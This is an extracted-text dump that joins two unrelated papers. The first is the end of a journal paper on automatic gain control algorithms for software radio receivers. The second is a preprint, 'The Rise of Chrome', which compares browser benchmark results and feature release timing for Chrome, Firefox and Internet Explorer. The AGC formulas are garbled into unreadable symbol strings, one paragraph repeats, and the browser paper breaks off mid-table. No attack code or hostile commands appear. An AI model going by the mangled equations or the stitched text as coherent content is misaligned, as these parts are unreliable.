follows: Figure 2. AGC algorithm implementation principle2 The recursive formula is: }])()(log{}[log{)}(log{)}1(log{ nxnARanAnA  In order to make the response time faster, Before comparing with the comparative value R, The output value of the amplifier )()()( nxnAny  is logarithmic before comparison. When the magnitude is less than R, })()(log{ nxnA is less than }log{ R .Therefore, })()(log{}log{ nxnAR  is positive. The magnification becomes larger, Thus, the small signal is enlarged. When the magnitude is greater than R, })()(log{ nxnA is larger than }log{ R , therefore })()(log{}log{ nxnAR  is negative, The amplification factor )(nA decreases, thus the attenuation of large signal is realized. Through the above algorithm, the small signal is enlarged, Large signal attenuation. Suppose the input signal is )()( ncunx  ，have }/log{]1)}[(log{)}1(log{ RcaanAnA  International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 95 )(])1(1}[log{)}(log{ nua R c nA n  As can be seen from the above formula, The gain of the stabilized signal is c R ，The time constant is approximately equal to a 1 VI. SIMULATION RESULTS The AGC algorithm is implemented by matlab. Two AGC algorithms are added to the demodulation of a narrowband QPSK signal. By observing and comparing the AGC output signals, The two schemes are proved to be completely feasible. The magnification becomes larger, Thus, the small signal is enlarged. When the magnitude is greater than R, })()(log{ nxnA is larger than }log{ R ， therefore })()(log{}log{ nxnAR  is negative, The amplification factor )(nA decreases, thus the attenuation of large signal is realized.Through the above algorithm,The simulation results of two AGC schemes are shown in Fig. 3 and Fig. 4 respectively. Figure 3. The simulation results of AGC algorithm when the input signal of the first AGC scheme change 0 1000 2000 3000 4000 5000 6000 7000 8000 -5 -4 -3 -2 -1 0 1 2 3 4 5 0 1000 2000 3000 4000 5000 6000 7000 8000 -30 -25 -20 -15 -10 -5 0 5 10 15 0 1000 2000 3000 4000 5000 6000 7000 8000 0 1 2 3 4 5 6 7 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 96 Figure 4. The simulation results of AGC algorithm when the input signal of the second AGC scheme changes VII. CONCLUDING REMARKS Since the introduction of software radio,its brand-new software value concept solves the problem of wireless standard interoperability.，Then it triggered a worldwide research climax. Software radio receivers, Whether the signal amplitude is stable or not will affect the timing synchronization and phase synchronization recovery of the receiver. This will determine whether the signal can be received with high quality, so automatic gain control (AGC) is applied to the input signal. High quality signal reception can be achieved. These two AGC schemes have fast convergence and accurate steady-state response characteristics, and the algorithm is simple.It is convenient for software radio system to be realized by DSP. REFERENCE [1] Research on the Practical Course "Software Radio System Design and Verification" [J]. DuanRui, Chen Zhuming, Zou Lin. Experimental Science and Technology. 2016 (06) [2] Research on SOPC-based Software Radio System [J]. Yang Zhengyu, Li Bing. Microcomputer and Application. 2010 (01) [3] Application Research of Radar System Based on Software Radio Technology [J]. Liu Xiaoping. Information and Computer (Theoretical Edition). 2018 (21) [4] Application of Software Radio Technology in FM Transmitter Design [J]. Sandik.Digital Communication World. 2017 (02) [5] Application of Software Radio Technology in Ship Communication [J]. Wang Huan. Strait Science and Technology and Industry. 2017 (09) [6] Application and Development of Software Radio Technology [J]. Wang Hongbo. Computer Programming Skills and Maintenance. 2016 (19) 0 1000 2000 3000 4000 5000 6000 7000 8000 -5 -4 -3 -2 -1 0 1 2 3 4 5 0 1000 2000 3000 4000 5000 6000 7000 8000 -40 -30 -20 -10 0 10 20 30 0 1000 2000 3000 4000 5000 6000 7000 8000 0 1 2 3 4 5 6 7 8 9 Fig. a Fig. b work_fawdarttj5h2rku4pl5w34q76i ---- The rise of Chrome A peer-reviewed version of this preprint was published in PeerJ on 28 October 2015. View the peer-reviewed version (peerj.com/articles/cs-28), which is the preferred citable publication unless you specifically need to cite this preprint. Tamary J, Feitelson DG. 2015. The rise of Chrome. PeerJ Computer Science 1:e28 https://doi.org/10.7717/peerj-cs.28 https://doi.org/10.7717/peerj-cs.28 https://doi.org/10.7717/peerj-cs.28 The Rise of Chrome Jonathan Tamary Dror G. Feitelson School of Computer Science and Engineering The Hebrew University, Jerusalem, Israel E-mail: feit@cs.huji.ac.il Abstract Since Chrome’s initial release in 2008 it has grown in market share, and now controls more than half of the desktop browsers market. In contrast with Internet Explorer, the previous dominant browser, the growing dominance of Chrome was not achieved by marketing practices such as bundling the browser with a pre-loaded operating system. The shift to Chrome therefore raises the question of how Chrome achieved this remarkable feat, while other browsers such as Firefox and Opera were left behind. We show that both the performance of Chrome and its conformance with relevant standards are typically better than those of the two main contending browsers, Internet Explorer and Firefox. In addition, based on a survey of the importance of 25 major features, Chrome product managers seem to have made somewhat better decisions in selecting where to put effort. Thus the rise of Chrome is consistent with technical superiority over the competition. Keywords: Browser war, Chrome, Market share, Software adoption, Benchmark, Feature selection. 1 Introduction The most notable use of the Internet is the World Wide Web (WWW). The web was created by Tim Berners-Lee and his colleagues at CERN (The European Organization for Nuclear Research) in 1989. In order to consume information from the web, one must use a web browser to view web pages. The first web browser (which was in fact named WorldWideWeb) was developed at CERN as part of the WWW project [1]. But the first popular browser, which set the growth of the web in motion towards the wide use we see today, was Mosaic, which was developed by Marc Andreessen and Eric Bina at the National Center for Supercomputing Applications (NCSA) in 1993 [40]. The open nature of the web makes it possible for different browsers to co-exist, possibly providing different features, user interfaces, and operating system support. Over the years different browsers have competed for the user’s choice. The competition between browsers has led to several “browser wars” — periods of fierce competition between different web browsers that are characterized by technological innovation and aggressive marketing, typi- cally leading to the eventual dominance of one browser and the fall of another. In recent years we have witnessed such a shift (albeit somewhat protracted) from Microsoft’s Internet Explorer to Google’s Chrome. The reasons for this shift are most probably a mix of technical reasons and marketing reasons. Our goal is to explore the technical aspects, and see whether they can explain the growing popularity of Chrome. In particular, we wanted to assess the technical quality of chrome and compare it with the quality of its rivals. To do so we downloaded all the version of Chrome, Firefox, and Internet Explorer that were released over a period of five years, and compared them using a set of benchmarks which together provide a rather comprehensive coverage of browser functionality and features. As far as we know our work is by far the widest study of its kind. In a nutshell, we find that Chrome is indeed technically superior to other browsers according to most commonly- used benchmarks, and has maintained this superiority throughout its existence. Also, based on a survey of 254 users, the features pioneered by Chrome ahead of its competitors tend to be those that the users consider more important. Thus Chrome’s rise to dominance is consistent with technical superiority. However, one cannot rule out the large effect of the Google brand and the marketing effort that was invested as factors that contributed greatly to the realization of Chrome’s technical potential. 1 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.966v2 | CC-BY 4.0 Open Access | rec: 5 Oct 2015, publ: 5 Oct 2015 2 The Browsers Landscape 2.1 Browsers History Not long after the release of the Mosaic web browser in 1993 it became the most common web browser, keeping its position until the end of 1994. The factors contributing to Mosaic’s popularity were inline graphics, which showed text and graphics on the same page, and popularizing the point and click method of surfing. Moreover, it was the first browser to be cross-platform including Windows and Macintosh ports. Amazingly, by the end of 1995 it’s popularity plummeted to only 5% of the web browser market [28]. This collapse in Mosaic’s popularity was concurrent to the rapid rise of Netscape Navigator which was released in December 1994 and managed in less than two years to reach around 80% market share (different sources cite somewhat different numbers). Several factors are believed to have caused the fast adoption of Netscape by users. First, it was a natural followup of Mosaic as it was developed by the same people. Second, Netscape introduced many technological in- novations such as on-the-fly page rendering, JavaScript, cookies, and Java applets [28]. Third, Netscape introduced new approaches to testing and distribution of web browsers by releasing frequent beta versions to users in order to test them and get feedback [43]. Netscape’s popularity peeked in 1996 when it held around 80% market share. But in August 1995 Microsoft released the first version of Internet Explorer based on an NCSA Mosaic license. A year later, in August 1996, with the release of Internet Explorer 3, a browser war was on. By August 1999 Internet Explorer enjoyed 76% market share [41]. During this browser war it seems that Internet Explorer did not have any technological advantage over Netscape, and even might have been inferior. Therefore, other reasons are needed to explain Internet Explorer’s success. One reason was that Netscape’s cross platform development wasn’t economical: instead of focusing on one dominant platform (Windows) it had approximately 20 platforms which caused a loss of focus. Meanwhile, Microsoft fo- cused on only one platform. Second, Microsoft bundled Internet Explorer with Windows without a charge, and as Windows dominated the desktop operating systems market Explorer was immediately available to the majority of users without any effort on their part. In an antitrust investigation in the U.S., Microsoft was found guilty of abusing its monopoly in the operating systems market by bundling Internet Explorer with Windows for free. Lewis describes this as follows [33]: “Adding Internet Explorer to Windows 95 and calling it Windows 98 is innovation in Gates’ terminol- ogy, but it is monopolizing according to DOJ.” Settling the antitrust case took several years (October 1997 to November 2002), during which Internet Explorer deposed Netscape as the most popular browser. And once Internet Explorer was entrenched, it’s market share grew even more due to a positive feedback effect. The standard tags used in HTML (Hyper-Text Markup Language, in which web pages are written) are defined by the W3C (World Wide Web Consortium). However, both Microsoft and Netscape extended the HTML standard with their own special tags, thus creating two competing sets of HTML tags and behaviors. Web developers with limited resources then had to choose one of these tag sets, and as Internet Explorer usage grew they opted to use Internet Explorer’s extensions, thereby making it ever more preferable over Netscape [35]. The dominance of Internet Explorer was so strong that Microsoft didn’t bother to release a major version of Internet Explorer from 2001 until 2006, making do with a Service Pack for Internet Explorer 6 as part of a Windows XP Service Pack. Up to this point browsers were proprietary software, even if distributed for free. But with the collapse of Netscape’s market share, Netscape released its Netscape Communicator 5.0 source code in March 1998 for com- munity involvement in the development via mozilla.org [2]. The Mozilla Suite was created based on this source code release. However, the development continued to be influenced by Netscape Communications Corporation, which had been acquired by AOL. David Hyatt, Joe Hewitt, and Blake Ross were not pleased with the alliance of Mozilla with Netscape, which was hurting Mozilla independence and more importantly led to feature creep and bloat. So in mid 2001 they created an experimental branch of the Mozilla Suite, which kept the user interface but reimplementing the backend from scratch [3]. This branch became the open source Firefox browser, and on August 2 Figure 1: Browsers usage data from StatCounter.com. 9, 2003 Mozilla released a revised road map that reflected a shift from the Mozilla Suite to Firefox [4]. Firefox was finally released on November 9, 2004 [5]. later, in March 2011, Mozilla moved to rapid development with a 16-week cycle and then a 6 weeks cycle [6, 7]. Firefox’s market share grew slowly, and by the end of 2009 it managed to wrestle away up to 30% from Internet Explorer. But by this time a new contender had arrived. Google released Chrome 1.0 on September 2, 2008. Concurrently, Google released most of the browser’s source code as an open source project named Chromium thus establishing an open source community. The main reason was the belief that a strong community will help improve Chrome [8]. Additional reasons were to help drive the web forward as other open source projects like Firefox and WebKit did, and enabling people to create their own projects based on Chromium. As of today the development of Chrome is based on the development of stable releases of Chromium, and the two browsers are identical in most aspects [9]. However, it is important to distinguish Chrome from Chromium, as Chrome has several features that are absent from Chromium such as a non-free PDF viewer. Chrome and Chromium moved to a rapid development strategy in mid 2010 [10]. 2.2 Browsers Usage Statistics In the six years since its release Chrome has dethroned Internet Explorer, and Firefox’s market share has also decreased, as shown in Figure 1. Data for such statistics is obtained as follows. Browser usage can be tracked using a counter embedded in the HTML source code of web sites. The counting is implemented using a request to a counting service, enabling the counting service to also extract the browser information from the request and to use it to tabulate browser usage statistics. The data shown is from one of these services, StatCounter.com [11]. There are two main methods to interpret web browsers usage. The first method is to measure how many page loads came from each type of browser in a certain period of time. The second method counts how many unique clients (installations) were active in a certain period of time. Therefore, if a user visits 10 web pages, the first method will count these visits as 10 uses of the browser, while in the second method will count them as one user. Since the two methods measure different parameters their results may differ. The first method favors browsers that are used by heavy users, while the second method just counts the number of unique users without taking their activity into account, which may be a drawback if we consider users who use the web extensively to be more important. Moreover, identifying unique users is non-trivial and requires manipulating the raw data. We therefore use the raw counts data, and specifically the data for desktop browsers only not including mobiles and tablets. (The nick in the graphs at August 2012 represents the beginning of collecting data about tablets separately.) As shown in the graph, Chrome’s market share has risen consistently over the years, largely at the expense of Internet Explorer. As of January 2015, Chrome was responsible for 51.7% of the page loads while Internet Explorer was responsible for 21.1%, Firefox for 18.7%, and other browsers for 8.4%. 3 Note that in fact any site can track the distribution of browser usage among the users who access that site. Such tracking may lead to different results if the visitors to a certain site prefer a certain browser. For example, w3schools.com (a site devoted to tutorials about web development) also publishes data about browser usage. Their results for January 2015 are that 61.9% use Chrome, 23.4% use Firefox, and only 7.8% use Internet Explorer [12]. This probably reflects a biased user population of web developers who tend to work on Linux platforms rather than on Windows. At the opposite extreme, netmarketshare.com claims that only 23% of the market uses Chrome, while fully 58% still use Internet Explorer (these figures are again for January 2015) [13]. There is a danger that the StatCounter data is also biased, but it is thought to provide a good reflection of common usage by the public on popular web sites, because its data is based on counters embedded in many different sites. Further justification is given in the threats to validity section. 3 Research Questions Despite possible differences in usage statistics, it is clear that Chrome is now a dominant player in the web browser market. The question is how this dominance was achieved, and in particular whether it is justified from the technical point of view. We divide this into the following specific questions: 1. Is Chrome technically superior to its competitors? Specifically, (a) Is the performance of Chrome superior to that of its competitors as measured by commonly accepted browser performance benchmarks? (b) Is the start-up time of Chrome competitive with the start up times of its competitors? (c) Does Chrome conform to web standards better than its competitors as measured by commonly accepted browser conformance benchmarks? 2. Given that the browser market is not static and web usage continues to evolve, (a) Did Chrome introduce features earlier than its competitors? (b) Were the features that Chrome introduced first more important than those introduced by its competitors? To answer these questions we tested the three major browsers which together account for 91% of the market share. Thus we did not initially test Opera and Safari, whose market share is very low; Safari is also less relevant as it is tightly linked to the Mac OS X platform, so it does not compete with Chrome for most users1. The question regarding the release of important features earlier also involved a wide user survey to assess the relative importance of different features. Note that the performance and conformance evaluations are not tied to one point in time, but rather they are evaluated over the whole period when chrome achieved its rise in market share. As a result we also found interesting information about the consistency (and sometimes inconsistency) of browser benchmarks which was not anticipated in advance. 4 Technical Performance In this section we present the methodology and results pertaining to answering research question (1), namely the relative performance of Chrome and the competing browsers. 4.1 Experimental Design Timing is important to web page designers, because it affects the user experience [39]. But the precise definitions of performance metrics are complicated to pin down [34]. As a result quite a few different benchmarks have been designed and implemented over the years. Instead of proposing yet another benchmark, we used several of the more 1 A Windows version available for only several years and then discontinued. 4 Benchmark Type Content Response SunSpider performance Javascript tasks time BrowserMark performance general browser performance score CanvasMark performance <canvas> tag score PeaceKeeper performance Javascript tasks score Start-up Times performance cold startup time time HTML5 Compliance conformance HTML standard score CSS3 Test conformance CSS standard score Browserscope Security conformance security-enhancing features tests passed Table 1: The benchmarks used in our study and their response variables. Figure 2: The release date of each version tested. widely accepted and commonly used benchmarks to evaluate the technical performance of the different browsers, selecting a set which cover a wide range of functionalities. These benchmarks are divided to two categories. The first category is performance, and tests the performance of different aspects of the browsers. This included general browser performance, aspects of JavaScript processing, and in particular support for the HTML5 <canvas> tag. The second category is conformance, and tests the conformance of the different browsers to common standards such as the HTML5 and CSS3 standards. Note, however, that the tests typically check only that elements of the standard are recognized, and not the quality of the implementation. This is because assessing the quality may be subjective and depend on graphical appearance. In addition we imple- mented our own methodology for measuring startup times, as this was not covered by the available benchmarks. The benchmarks and their response variables are listed in Table 1. Note that the benchmarks do not include low-level issues such as memory usage. The reason is that these benchmarks are not intended to characterize the interaction between the browser and the underlying hardware platform, but rather the interaction of the browser with the user. We selected these benchmarks because market share depends on users who are more influenced by general performance and features, not by details of hardware utilization. In order to assess the technical performance of the competing browsers during the period when Chrome gained its market leadership, we measured all the releases of these browsers using all the benchmarks. Specifically, the measurements covered all Chrome versions from 1 to 31, all Firefox versions from 3 to 26, and all Internet Explorer versions from 8 to 11, meaning all the browsers versions in a five year span starting in mid 2008 until the end of 2013 (Figure 2). This is the period from the first release of Chrome until it achieved around 50% market share. 4.2 Execution of Measurements The measurements were conducted on two identical Core i5 computers (Lenovo ThinkCentre M Series with i5- 3470 CPUs running at 3.20 GHz) with 4GB RAM each, and Windows 7 Professional SP1 operating systems. One machine ran Windows 7 32 bit and the other ran Windows 7 64 bit. The browser versions used on the 32 bit system were Chrome 1–12, Firefox 3–5, and Internet Explorer 8–9, i.e. all the browsers released up to May 2011. The browsers versions used on the 64 bit system were Chrome 13–31, Firefox 6–26, and Internet Explorer 10–11. The versions were divided between the machines since we encountered some compatibility issues with earlier versions 5 Figure 3: Comparing the results of two benchmarks on 32 bit and 64 bit platforms. Type Benchmark Repetitions Versions with no data Internet Explorer Firefox Chrome Performance SunSpider 0.9.1 3 10,11 ≥6 ≥13 SunSpider 1.0.2 3 8,9 ≤5 ≤12,30,31 BrowserMark 2.0 3 8 3,3.5,3.6 1 CanvasMark 2013 3 8 3 1,2,3 PeaceKeeper 3 1,2,3,4 Start-up Times 20 Conformance HTML5 Compliance N/A 4 2,7 CSS3 Test N/A 3 Browserscope Security N/A Table 2: The benchmarks used in our study, how many repetitions were performed, and which browser versions could not be measured. of Chrome on Windows 7 64 bit. Moreover, it makes sense to switch to 64 bit along the way to reflect the growing adoption of 64-bit systems. To make sure that the measurements are consistent between 32 bit and 64 bit operating systems and eliminate operating system bias we have checked a third of the browser versions on both systems, focusing on versions with a six months release gap. Examples for two of the benchmarks are shown in Figure 3. SunSpider 1.0.2 is an example of a relatively big difference between the results on the two platforms (which is still quite small), and PeaceKeeper is an example of a very small difference. In general we did not see any dramatic differences between the platforms. We therefore do not present any more results about such comparisons. On all performance benchmarks we ran 3 repetitions of each measurement, while for the start-up times mea- surements we ran 20 repetitions. Error bars are used in the graphs to show the standard error. In all cases, the benchmarks and tests were the only thing that ran on the test machines. The test machines had an Internet connec- tion outside our firewall, so they were not on the local departmental network. This was done for security reasons, as our systems group refused to allow the use of old (and probably vulnerable) browsers within the firewall. Not all the measurements ran properly with all the versions, especially with earlier versions. The problems were due to the fact that most of the benchmarks were designed and written later than some of the browser early versions, and used some features or technology that were not yet implemented in those early versions. The details are given in Table 2. 6 (a) (b) Figure 4: SunSpider 0.9.1 and 1.0.2 results. Note difference in scale for the two versions. 4.3 Performance Benchmarks Results and Interpretation 4.3.1 SunSpider SunSpider is a well known benchmark developed by WebKit, an open source web browser engine project. Its goal is to measure core JavaScript performance and enable the comparison of different browsers or successive version of the same browser. WebKit designed this benchmark to focus on real problems that developers solve with JavaScript [14]. Therefore the benchmark does not include microbenchmarks to evaluate specific language features, but rather tasks such as generating a tagcloud from JSON input, 3D raytracing, cryptography, and code decompression. Moreover, each of the tests is executed multiple times to ensure statistical validity. However, perhaps due to these repetitions, the behavior of the benchmark may actually not mimic real JavaScript work on production sites [36]. The benchmark measures the time to perform a set of tasks, so lower values are better. In the study we chose to use version 1.0.2, which is the current version and was introduced by WebKit in order to make the tests more reliable [15, 16]. However, version 1.0.2 didn’t work on old browser versions (Table 2). Therefore, we used version 0.9.1 on old browser versions [17], specifically those that were tested on the 32 bit machine. Using SunSpider 0.9.1 we find that when Chrome was introduced it scored significantly better than Internet Explorer and Firefox. In the second version tested of Firefox (Firefox 3.5) the score was greatly improved but still lagged the parallel Chrome version. Although Internet Explorer 8 was released a couple of months after Chrome 1 it was five times slower. It took more than two years for Firefox and Internet Explorer to catch up with Chrome’s parallel version (Figure 4a). In fact, Internet Explorer 9 not only caught up with Chrome but surpassed it. This superior performance has been attributed to its JavaScript optimization for dead code elimination, which some say was specifically done to boost SunSpider performance [18, 19]. In the SunSpider 1.0.2 tests Internet Explorer continued to show significantly better results compared to its rivals. Firefox and Chrome showed similar results most of the time (Figure 4b). For some reasons Chrome versions 30 and 31 had problems with this benchmark, but these were fixed in Chrome 32. 4.3.2 BrowserMark 2.0 BrowserMark 2.0 is a general browser benchmark developed by Rightware (Basemark), a purveyor of benchmark- ing and evaluation technology for the embedded systems industry. Originally designed to test mobile and embedded devices, it is nevertheless commonly used to also test desktop browsers. The benchmark tests general browser per- formance including aspects such as page loading, page resizing, standards conformance, and network speed, as 7 Figure 5: BrowserMark 2.0 results. Figure 6: CanvasMark 2013 results. well as WebGL, Canvas, HTML5, and CSS3/3D. The calculated score combines all of these and higher scores are better. The early versions of Internet Explorer and Firefox did not work with this benchmark (which is understandable given that the benchmark version we used was released only in November 2012). All of the browsers tested showed a distinct improvement trend as new versions were released (Figure 5). Chrome in all of its versions was better than the equivalent rivals and showed a steady improvement over time. Internet Explorer also showed an improvement over time but always came in last from all the browsers tested. Firefox performance was between Chrome and Internet Explorer. Interestingly, it showed an inconsistent behavior, with the general improvement in benchmark score mixed with local decreases in score. 4.3.3 CanvasMark 2013 CanvasMark 2013 is a benchmark for performance testing the HTML5 <canvas> tag [20]. This tag is a container for graphics, which are typically drawn using JavaScript. The benchmark is composed of several stress tests, using elements that are commonly used in games such as operations on bitmaps, canvas drawing, alpha blending, polygon fills, shadows, and drawing text. Each test starts with a simple scene and adds elements until the browser is reduced to a rendering rate of 30 frames-per-second (the rate decreases as the scene becomes more complex). The score is a weighted average of the time the browser managed to perform at above 30 frames-per-second. Higher scores are better. In this benchmark’s documentation there was a note for Chrome users using Windows, encouraging them to change a setting in order to get better results due to a bug in the GPU VSync option for the Windows version of Chrome. However, we did not change the setting since we want to test the versions as the average user would. The results of running the benchmark show that Chrome exhibited inconsistent results over time (Figure 6). A great improvement was achieved from version 4 to 7 (version 4 is the first shown, because the benchmark did not run on version 1–3). In contrast there was a sharp decline from version 10 to 12. Later, an improvement occurred from version 14 to 17, immediately followed by a sharp decline of 50% of the score in version 18. But in spite of all these inconsistencies it was still better than Firefox and Internet Explorer during this time. Internet Explorer showed an improvement from version 9 to version 10, when it became the best-performing of the three browsers, due to a deterioration in Chrome’s scores. Chrome surpassed Internet Explorer again only in the last version tested. Firefox had the lowest scores, and does not show any improvement over time. 8 Figure 7: PeaceKeeper results. 4.3.4 PeaceKeeper PeaceKeeper is a browser benchmark developed by FutureMark, a purveyor of mostly hardware benchmarks for desktop and mobile platforms [21]. (Rightware, the company that developed BrowserMark, was a spinoff from FutureMark.) It includes various tests designed to measure the browser’s JavaScript performance, but given that JavaScript is so widely used in dynamic web pages, it can actually be considered to be a general benchmark for browser performance. The tests include various aspects of using JavaScript on modern browsers, such as the <canvas> tag, manipulating large data sets, operations on the DOM tree (the Document Object Model, which describes the structure of a web page), and parsing text. The score reflects processing rate (operations per second or frames per second rendered), so higher is better. In addition the benchmark includes various HTML5 capability checks, such as WebGL graphics, being able to play various video formats, and multithreading support. Chrome scored noticeably better results compared to its rivals for this benchmark, throughout the period of time that we checked (Figure 7). However, note that PeaceKeeper did not run on early versions of Chrome (Table 2). Also, while there was a general trend of improvement, it was not monotonic. Firefox and Internet Explorer scored similar results, both showing an improvement over time but still lagging behind Chrome. 4.4 Start-up Time Measurement Methodology and Results An important feature of all browsers, which may affect user satisfaction, is their startup times when they are launched. As we did not find a suitable benchmark that evaluates startup times we conducted specialized measure- ments to test the browser’s cold start-up times. A cold start-up time is when the browser starts for the first time since the operating system was booted. We tested the start-up times as follows. We wrote a script that runs during the operating system start-up. This script launches the browser one minute after the script starts running. The lag is meant to let the operating system finish loading. A time stamp is created just before launching the browser in order to mark the start time. The browser was set to open with a specially crafted page when it came up. The script passed the time stamp to the crafted page via a URL parameter. The crafted page creates a second time stamp indicating the start of the page processing. The difference between the two time stamps was defined as the browser start-up time. The start-up times are then sent to a server for logging. Advantages of this procedure are, first, that it is independent of network conditions, and second, the test is similar to the user’s real experience of launching the browser and loading the first page. The first versions of Chrome were the fastest to load (Figure 8). However, as Chrome’s development advanced, it’s start-up times crawled up. In Chrome version 7 the start-up times improved dramatically, but then continued to crawl up from version 13. In version 29 there was a spike in the start-up time, a 2.5 fold increase compared to the 9 Figure 8: Cold start-up times. previous version, followed by a partial correction in versions 30 and 31. Surprisingly Firefox start-up times look steady with a slight decrease, notably in version 7. As a result, while it was the slowest by a wide margin in 2009, it became the fastest in 2013. Internet Explorer start-up time were initially similar to those of Chrome, but then increased consistently over time, making it roughly twice as slow as the others in recent years (except for the spike in Chrome performance since version 29). 4.5 Conformance Benchmarks Results and Interpretation 4.5.1 HTML5 Compliance HTML (Hyper-Text Markup Language) is the language used to describe web pages, and the current version is HTML5. HTML5 introduced features like the <canvas> tag for use by multimedia applications, and integrated SVG (Scalable Vector Graphics) and MathML (for mathematical formulas). The first working draft of HTML5 was published in 2008, and the standard was finally approved in 2014, so its definition process fully overlaps the period of Chrome’s rise. The HTML5 Compliance benchmark consists of three parts. The main part is checking the conformance of the browser to the HTML5 official specification. The second part is checking specifications related to HTML5 such as WebGL. The third part is checking the specification for experimental features that are an extension to HTML5 [22]. The score is the sum of points awarded for each feature that is supported. The results for this benchmark show that all the browsers improve over time. Firefox had the best score until version 3.6, and after that Chrome version 4 and up had the best score (Figure 9). Internet Explorer always had the lowest score. 4.5.2 CSS3 Test CSS (Cascading Style Sheets) is the language used to describe the style of HTML pages. For example, using CSS one can set the style for web page headings and make it different from the default of the browser. The current version is 3, although level-4 modules are being introduced. CSS3 Test checks how many CSS3 elements in the W3C specification does a certain browser recognize [23]. This means CSS3 Test only checks the recognition itself but does not check the implementation or the quality of the implementation, namely whether the resulting rendition of the web page indeed looks like it should. Interestingly Chrome’s score did not change in the first three years, though it still managed to have a better score than its rivals. From version 15 Chrome consistently improved until the last version tested, remaining better than its rivals all along (Figure 10). Firefox showed several improvements in a stepwise manner. Internet Explorer 10 Figure 9: HTML5 compliance results. Figure 10: CSS3 Test results. Figure 11: Browserscope Security results. had the lowest score in the first version tested (version 9) but improved its score dramatically in versions 10 and 11, achieving essentially the same level as Firefox. 4.5.3 Browserscope Security Browserscope is a community-driven project which profiles various aspects of web browsers. One of these is the obviously important feature of security. Specifically, Browserscope Security is a collection of tests meant to check “whether the browser supports JavaScript APIs that allow safe interactions between sites, and whether it follows industry best practices for blocking harmful interactions between sites” [24]. For example, one of the tests checks whether the browser has native support for JSON parsing, which is safer than using eval. The score is simply how many tests passed. While this is not strictly a conformance test, as there is no official standard, we include it due to the importance of security features on the Internet. The results are that all three browsers exhibited a general (although not always monotonic) improvement in their security results over time. The relative ranking according to these tests is very consistent between browser versions (Figure 11). Across practically the whole period Chrome had the highest score, Firefox had the lowest, and Internet Explorer was in between. The only exception is a large dip in score for Chrome versions 2 and 3, where version 2 was the worst of all parallel browser versions. This was surprising because of the overall consistency, and the fact that in the first version released Chrome had the highest score compared to its rivals. 11 Figure 12: Sample Opera results overlaid on the previous results. 4.6 Additional Results with Opera Our main measurements focused on the three top browsers, which together control more than 90% of the desktop market. But when considering the relative importance of technical issues as opposed to marketing, we felt the need to also consider the smaller browsers. This is especially important in the early years, when Chrome’s market share was low, and the question was what enabled Chrome to surge ahead while other browsers were left behind. We therefore conducted a few additional measurements using Opera. We focused on Opera and not on Safari for two reasons. First, Opera has a reputation for being an innovative and technologically advanced browser. Second, Safari is specifically targeted for Apple platforms, and therefore is not really part of the same desktop market as the other browsers we are studying. Not all versions of Opera were tested, as many of the benchmarks did not run properly on early versions. The results were that Opera performance was generally inferior to that of Chrome (two examples are shown in Figure 12). In some benchmarks, notably BrowserMark and Browserscope Security, its scores were actually lower than for all other browsers for many years. The sharp improvement in BrowserMark shown in Figure 12 is probably due to the move to using WebKit (and thus the same rendering engine as Chrome) in version 15 [25]; similar improvements were also seen in some other benchmarks in this version. In other benchmarks, such as HTML5 Compliance and CSS3 Test, Opera’s results were similar to those of Firefox throughout. The only benchmark in which Opera was the best browser for a considerable period was CanvasMark, but this period only started in 2012 (and performance dropped in version 15). 5 Feature Selection and Release Another aspect in which the browsers differ from one another is their feature sets: all obviously have the same basic features allowing users to browse the web and display web pages, but new features are added all the time as web usage continues to evolve. However, not all features have the same importance, so it is advantageous for a browser to have the most meaningful features as early as possible. In this section we present the methodology and results pertaining to answering research question (2), namely which browsers released features early and which browsers lagged in releasing features. In addition we wanted to evaluate the importance of each feature. We used an online survey to assess the importance of each feature to the end users. 5.1 Experimental Design and Methodology The investigation of the features embodied in each browser and their release times involved the following steps: 12 # Feature Explanation Pre Chrome 1 1 Bookmark management Allows the user to organize/delete/add bookmarks 2 Password management Allows the browser to remember credentials to a certain web site upon the user’s request 3 Search engine toolbar Easy access to a search engine from the browser tool bar 4 Tabbed browsing The ability to browse multiple web pages in a single browser window 5 Pop-up blocking Blocks pop-ups that the user didn’t explicitly ask for 6 Page zooming Scale the text of a web page 7 History manager Manages history of recent web pages that the user browsed 8 Phishing protection Block or warn when surfing to web pages that masquerade as another (legitimate) website 9 Privacy features Manages the user preferences regarding passwords, history, and cookie collection 10 Smart bookmarks bookmarks that directly give access to functions of web sites, as opposed to filling web forms at the respective web site for accessing these functions 11 Tabbing navigation The ability to navigate between focusable elements with the tab key Released at same time 1 Access keys Allows you to navigate quickly through a web page via the keyboard 2 Adaptive address bar Suggest webpages as you type an address or search keywords from your history or from a search engine 3 Full page zoom Scales the whole page, including images and CSSs 4 Hardware acceleration Allows the GPU to help the browser to speed up certain tasks that the GPU is more capable for 5 Incognito Allows the user to browse the web with reduced identifiable trace (notably doesn’t allow cookies) 6 Reopen closed tabs Reopen a recently closed tab 7 Full screen Displays the page in full screen mode Table 3: Features not used in comparisons as they did not reflect differences between browsers. 1. Listing of major features of modern browsers. 2. Establishing the release date of each feature by each browser 3. Identification of features that differentiate between the browsers 4. Conducting an online survey of web users to assess the relative importance of the different features to end users 5. Performing a statistical analysis of the relative importance (according to the survey) of features that each browser released earlier or later than other browsers. The following subsections provide details regarding these steps. 5.1.1 Feature Selection We identified 43 features which in our opinion represent a modern browser. These features are listed in Table 3 and Table 4. The release date of each feature in each browser was ascertained by the combination of reading release documentation and checking whether features exist in the different versions we downloaded. The third step, namely identifying features that differentiate between the browsers, is based on the release dates. The reason is that features only differentiate between browsers if they are released at different times. As 13 # Feature Explanation 1 Add-ons manager Allows you to disable/remove previously installed add-ons 2 Download manager Allows you to view/pause current downloads and view previously downloaded files 3 Auto-updater Silently & automatically updates the browser if there’s a new version 4 Caret navigation Allows you to navigate through a site using the arrow keys (just like in any document processor e.g. in Microsoft Word) 5 Pinned sites Allows you to have faster access to your favorite sites like Facebook or your Email provider 6 Sync Allows you to sync you favorites/preferences/saved passwords etc. through computers and platforms 7 Session restore (automatically) Upon a crash, the browser will restore the sites you were surfing before the crash 8 Crash/security protection Allows you to continue browsing although a site/plugin crashed or hanged 9 Malware protection Enables the browser to warn and block suspicious sites that are known to be harmful 10 Outdated plugin detection Allows the browser to detect if a plugin has become incompatible/vulnerable with the browser’s version 11 Do not track Allows the browser to request sites not to track the browsing 12 Themes Allows you to personalize the browser appearance by changing the skin 13 Experimental features Allows you to try experimental features in the browsers that aren’t turned on by default 14 Multiple users Allows you to have multiple 